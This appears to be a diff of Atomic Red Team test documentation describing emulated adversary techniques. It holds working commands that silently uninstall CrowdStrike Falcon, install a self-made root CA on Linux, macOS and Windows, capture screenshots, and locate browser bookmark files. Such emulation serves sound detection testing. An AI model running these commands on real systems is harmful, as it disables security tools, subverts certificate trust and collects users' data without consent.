+ +## Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows +Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}} +``` + + + + + +
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 0a882b64..19e131eb 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -34,7 +34,7 @@ Use screencapture command to collect a full desktop screenshot #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Output file path | Path | desktop.png| +| output_file | Output file path | Path | /tmp/T1113_desktop.png| #### Attack Commands: Run with `bash`! @@ -44,6 +44,10 @@ Use screencapture command to collect a full desktop screenshot screencapture #{output_file} ``` +#### Cleanup Commands: +```bash +rm #{output_file} +``` @@ -63,7 +67,7 @@ Use screencapture command to collect a full desktop screenshot #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Output file path | Path | desktop.png| +| output_file | Output file path | Path | /tmp/T1113_desktop.png| #### Attack Commands: Run with `bash`! @@ -73,6 +77,10 @@ Use screencapture command to collect a full desktop screenshot screencapture -x #{output_file} ``` +#### Cleanup Commands: +```bash +rm #{output_file} +``` @@ -92,7 +100,7 @@ Use xwd command to collect a full desktop screenshot and review file with xwud #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Output file path | Path | desktop.xwd| +| output_file | Output file path | Path | /tmp/T1113_desktop.xwd| #### Attack Commands: Run with `bash`! @@ -103,6 +111,10 @@ xwd -root -out #{output_file} xwud -in #{output_file} ``` +#### Cleanup Commands: +```bash +rm #{output_file} +``` @@ -122,7 +134,7 @@ Use import command to collect a full desktop screenshot #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Output file path | Path | desktop.png| +| output_file | Output file path | Path | /tmp/T1113_desktop.png| #### Attack Commands: Run with `bash`! @@ -132,6 +144,10 @@ Use import command to collect a full desktop screenshot import -window root #{output_file} ``` +#### Cleanup Commands: +```bash +rm #{output_file} +``` diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md index a25bb9f4..c64d7f84 100644 --- a/atomics/T1130/T1130.md +++ b/atomics/T1130/T1130.md @@ -14,6 +14,12 @@ In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d - - [Atomic Test #1 - Install root CA on CentOS/RHEL](#atomic-test-1---install-root-ca-on-centosrhel) +- [Atomic Test #2 - Install root CA on Debian/Ubuntu](#atomic-test-2---install-root-ca-on-debianubuntu) + +- [Atomic Test #3 - Install root CA on macOS](#atomic-test-3---install-root-ca-on-macos) + +- [Atomic Test #4 - Install root CA on Windows](#atomic-test-4---install-root-ca-on-windows) +
@@ -37,7 +43,7 @@ Creates a root CA with openssl ```sh openssl genrsa -out #{key_filename} 4096 -openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename} +openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ]; then @@ -53,4 +59,141 @@ fi +
+
+ +## Atomic Test #2 - Install root CA on Debian/Ubuntu +Creates a root CA with openssl + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| +| cert_filename | CA file name | Path | rootCA.crt| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +mv #{cert_filename} /usr/local/share/ca-certificates +echo sudo update-ca-certificates +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Verify the certificate exists. It generates if not on disk. +##### Check Prereq Commands: +```cmd +if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```cmd +if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; +openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} +``` + + + + +
+
+ +## Atomic Test #3 - Install root CA on macOS +Creates a root CA with openssl + +**Supported Platforms:** macOS + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| +| cert_filename | CA file name | Path | rootCA.crt| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Verify the certificate exists. It generates if not on disk. +##### Check Prereq Commands: +```cmd +if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```cmd +if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; +openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} +``` + + + + +
+
+ +## Atomic Test #4 - Install root CA on Windows +Creates a root CA with Powershell + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| pfx_path | Path of the certificate | Path | rootCA.cer| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My +Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root" +``` + +#### Cleanup Commands: +```cmd +$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My +Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item +Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Verify the certificate exists. It generates if not on disk. +##### Check Prereq Commands: +```powershell +if (Test-Path #{cert_filename}) { exit 0 } else { exit 1 } +``` +##### Get Prereq Commands: +```powershell +$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My +Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path} +Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item +``` + + + +
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index 03244ea9..ae9f9e23 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md @@ -29,14 +29,24 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Firefox.txt| + #### Attack Commands: Run with `sh`! ```sh -find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \; +find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \; +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} 2>/dev/null +``` @@ -53,14 +63,24 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed. | Path | /tmp/T1217_Firefox.txt| + #### Attack Commands: Run with `sh`! ```sh -find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \; +find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \; +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} 2>/dev/null +``` @@ -77,14 +97,24 @@ Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Chrome.txt| + #### Attack Commands: Run with `sh`! ```sh -find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt \; +find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \; +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} 2>/dev/null +```